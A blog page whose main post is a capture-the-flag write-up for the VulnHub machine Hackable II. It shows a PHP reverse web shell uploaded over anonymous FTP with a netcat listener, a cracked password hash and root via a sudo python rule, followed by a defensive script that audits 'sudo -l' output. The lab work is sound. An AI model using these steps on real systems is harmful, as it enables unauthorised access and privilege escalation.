Wednesday, December 22, 2021

Wednesday, November 24, 2021

Welcome to Raccoon City

I just got back from seeing Resident Evil: Welcome to Raccoon City, and all I've really got to say is wow! Loved every moment of it, and how much closer to the game franchise it is than the previous iteration of the movie franchise. Lovers of the movies might not care for it unless they also enjoyed the games. Lovers of the games will probably enjoy it more than the previous movies.

Monday, November 22, 2021

The Circleville Letters Mystery

While looking up more information on The Dodleston Messages, I ran across this. How have I spent almost my entire life in small-town Ohio and never heard of The Circleville Letters before?

The Dodleston Messages

I am subscribed to a number of retro-computer channels on Youtube, and one of them introduced me to The Dodleston Messages. Enjoy!

Monday, November 1, 2021

Oddities in the Cassieverse

It has been brought to my attention, via the Discord server, that the first Cassie video no longer plays on cassieiswatching.com. It *used* to play from my website when it was running on my own server at home, and it played fine when I first moved it over to Blogger sometime in 2020-ish, but now it only plays from Youtube. This means that someone has logged into the PM's Youtube account to make this change within the last couple of years. This seems... interesting...

Monday, July 26, 2021

CaptureTheFlag - Hackable II

I've recently regained interest in cyber security, so I have been practicing on some of the CtF machines available on VulnHub. I started with some easy machines, as it's been quite some time since I've played with any of this, so after doing a couple, using walkthroughs, I downloaded Hackable II and imported it into VirtualBox, and set the network up as "Internal" on the same network as my Kali VirtualBox.

The first thing I did was run nmap to discover the IP of the new host:
sudo nmap 10.38.1.1/24
This revealed several servers running on the box:
Nmap scan report for 10.38.1.7
Host is up (0.00036s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:B5:56:29 (Oracle VirtualBox virtual NIC)

Hmmm... ftp, ssh, and a web server... The web server has the default apache2 site, which doesn't reveal anything too interesting... Apache2 Ubuntu Default Page... Nothing too extraordinary. So, back to nmap:

sudo nmap --script http-enum.nse 10.38.1.7

This revealed a folder named /files/ on the web server. So, I look at it in a web browser and see a file listing. So I attempt an anonymous ftp to the server, and, sure enough, it's the same folder listing. Could they have allowed anonymous uploads? I have a short text file, temp.txt, for just such tests...

put temp.txt

Success! And, if I refresh the web browser, the file shows up. So, I delete that file, and upload a php web shell, which points to my kali box:

put shell.php 

And on my kali box:

nc -nlvp 1234

And then I refresh the page in Firefox and switch back to my netcat session and check to see what users are on this box... Interesting...

$ cd /home
$ ls -lta
total 16
drwxr-xr-x 4 shrek shrek 4096 Jul 26 21:13 shrek
drwxr-xr-x 23 root root 4096 Nov 26 2020 ..
drwxr-xr-x 3 root root 4096 Nov 26 2020 .
-rw-r--r-- 1 root root 43 Nov 26 2020 important.txt

One user, shrek, and hmmm...

$ cat important.txt
run the script to see the data

/.runme.sh

Yeah... Not gonna run that... But...

$ cat /.runme.sh
#!/bin/bash
echo 'the secret key'
sleep 2
echo 'is'
sleep 2
echo 'trolled'
sleep 2
echo 'restarting computer in 3 seconds...'
sleep 1
echo 'restarting computer in 2 seconds...'
sleep 1
echo 'restarting computer in 1 seconds...'
sleep 1
echo '⡴⠑⡄⠀⠀⠀⠀⠀⠀⠀ ⣀⣀⣤⣤⣤⣀⡀
⠸⡇⠀⠿⡀⠀⠀⠀⣀⡴⢿⣿⣿⣿⣿⣿⣿⣿⣷⣦⡀
⠀⠀⠀⠀⠑⢄⣠⠾⠁⣀⣄⡈⠙⣿⣿⣿⣿⣿⣿⣿⣿⣆
⠀⠀⠀⠀⢀⡀⠁⠀⠀⠈⠙⠛⠂⠈⣿⣿⣿⣿⣿⠿⡿⢿⣆
⠀⠀⠀⢀⡾⣁⣀⠀⠴⠂⠙⣗⡀⠀⢻⣿⣿⠭⢤⣴⣦⣤⣹⠀⠀⠀⢀⢴⣶⣆
⠀⠀⢀⣾⣿⣿⣿⣷⣮⣽⣾⣿⣥⣴⣿⣿⡿⢂⠔⢚⡿⢿⣿⣦⣴⣾⠸⣼⡿
⠀⢀⡞⠁⠙⠻⠿⠟⠉⠀⠛⢹⣿⣿⣿⣿⣿⣌⢤⣼⣿⣾⣿⡟⠉
⠀⣾⣷⣶⠇⠀⠀⣤⣄⣀⡀⠈⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇
⠀⠉⠈⠉⠀⠀⢦⡈⢻⣿⣿⣿⣶⣶⣶⣶⣤⣽⡹⣿⣿⣿⣿⡇
⠀⠀⠀⠀⠀⠀⠀⠉⠲⣽⡻⢿⣿⣿⣿⣿⣿⣿⣷⣜⣿⣿⣿⡇
⠀⠀ ⠀⠀⠀⠀⠀⢸⣿⣿⣷⣶⣮⣭⣽⣿⣿⣿⣿⣿⣿⣿⠇
⠀⠀⠀⠀⠀⠀⣀⣀⣈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠇
⠀⠀⠀⠀⠀⠀⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
shrek:cf4c2232354952690368f1b3dfdfb24d'

So, off to https://crackstation.net/ and the password for shrek is, apparently, onion. This was also the title of the file listing page in the web browser. Clever clue ;) So... Kill the reverse shell and login via ssh and see what we can do with sudo...

$ ssh shrek@10.38.1.7
shrek@10.38.1.7's password:
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-194-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage


88 packages can be updated.
68 updates are security updates.


Last login: Mon Jul 26 21:09:32 2021 from 10.38.1.4
shrek@ubuntu:~$ sudo -l
Matching Defaults entries for shrek on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shrek may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/python3.5

Wait! What?! /usr/bin/python3.5 can be executed as root with no password?! Here's a quick and dirty sh.py:

root@ubuntu:~# cd /root
root@ubuntu:/root# ls -lta
total 32
-rw-------  1 root root   13 Jun 15 16:01 .bash_history
drw-------  4 root root 4096 Jun 15 13:35 .
-rw-------  1 root root 1581 Jun 15 13:28 root.txt
drwxr-xr-x 23 root root 4096 Nov 26  2020 ..
drw-------  2 root root 4096 Nov 25  2020 .cache
drw-------  2 root root 4096 Nov 25  2020 .nano
-rw-------  1 root root 3106 Oct 22  2015 .bashrc
-rw-------  1 root root  148 Aug 17  2015 .profile
root@ubuntu:/root# cat root.txt
                            ____
        ____....----''''````    |.
,'''````            ____....----; '.
| __....----''''````         .-.`'. '.
|.-.                .....    | |   '. '.
`| |        ..:::::::::::::::| |   .-;. |
 | |`'-;-::::::::::::::::::::| |,,.| |-='
 | |   | ::::::::::::::::::::| |   | |
 | |   | :::::::::::::::;;;;;| |   | |
 | |   | :::::::::;;;2KY2KY2Y| |   | |
 | |   | :::::;;Y2KY2KY2KY2KY| |   | |
 | |   | :::;Y2Y2KY2KY2KY2KY2| |   | |
 | |   | :;Y2KY2KY2KY2KY2K+++| |   | |
 | |   | |;2KY2KY2KY2++++++++| |   | |
 | |   | | ;++++++++++++++++;| |   | |
 | |   | |  ;++++++++++++++;.| |   | |
 | |   | |   :++++++++++++:  | |   | |
 | |   | |    .:++++++++;.   | |   | |
 | |   | |       .:;+:..     | |   | |
 | |   | |         ;;        | |   | |
 | |   | |      .,:+;:,.     | |   | |
 | |   | |    .::::;+::::,   | |   | |
 | |   | |   ::::::;;::::::. | |   | |
 | |   | |  :::::::+;:::::::.| |   | |
 | |   | | ::::::::;;::::::::| |   | |
 | |   | |:::::::::+:::::::::| |   | |
 | |   | |:::::::::+:::::::::| |   | |
 | |   | ::::::::;+++;:::::::| |   | |
 | |   | :::::::;+++++;::::::| |   | |
 | |   | ::::::;+++++++;:::::| |   | |
 | |   |.:::::;+++++++++;::::| |   | |
 | | ,`':::::;+++++++++++;:::| |'"-| |-..
 | |'   ::::;+++++++++++++;::| |   '-' ,|
 | |    ::::;++++++++++++++;:| |     .' |
,;-'_   `-._===++++++++++_.-'| |   .'  .'
|    ````'''----....___-'    '-' .'  .'
'---....____           ````'''--;  ,'
            ````''''----....____|.'

invite-me: https://www.linkedin.com/in/eliastouguinho/

And there it is! It took me longer to write this up than to get the root flag on this box. Next time, maybe something a little harder? ;)
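The `sudo -l` output above is what this box turns on: a rule that lets a low-privilege user run an interpreter as root, with NOPASSWD on top, is a root shell waiting to happen. The script below is an added example, not code from the write-up or from the VulnHub box, that parses that `sudo -l` output format and flags such rules; the sample text reuses the rule shown above plus two constructed extra rules, and the SHELL_CAPABLE set is an illustrative assumption rather than a complete list.

```python
import re

# Constructed sample: the "sudo -l" output from the write-up plus two extra
# rules (assumed, not from the box) so the parser sees more than one shape.
SAMPLE_SUDO_L = """\
Matching Defaults entries for shrek on ubuntu:
    env_reset, mail_badpass,

User shrek may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/python3.5
    (root) /usr/bin/systemctl restart apache2
    (ALL : ALL) NOPASSWD: ALL
"""

# Binaries that hand the caller code execution as the run-as user (illustrative).
SHELL_CAPABLE = {"sh", "bash", "dash", "zsh", "python", "perl", "ruby"}

# "(run-as) TAG: command, command" -> groups: run-as, tag string, commands
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(.+?)\s*$")

def _program_name(path):
    # "/usr/bin/python3.5" -> "python": drop the directory and version suffix
    return re.sub(r"[\d.]+$", "", path.split("/")[-1])

def parse_sudo_l(text):
    """Return (runas, tags, command) tuples from `sudo -l` output."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        runas, tag_str, cmds = m.groups()
        tags = {t.strip(": ") for t in tag_str.split()}
        # Commas inside command arguments are not handled by this split.
        for cmd in (c.strip() for c in cmds.split(",") if c.strip()):
            rules.append((runas.strip(), tags, cmd))
    return rules

def audit(rules):
    """Flag rules whose command is ALL or a shell/interpreter."""
    findings = []
    for runas, tags, cmd in rules:
        program = cmd.split()[0]
        if program == "ALL" or _program_name(program) in SHELL_CAPABLE:
            severity = "high" if "NOPASSWD" in tags else "medium"
            findings.append((severity, runas, cmd))
    return findings
```

A rule for an interpreter is flagged even without NOPASSWD, since on this box the user's password was recovered from a hash anyway; the severity only records whether sudo would have asked for it.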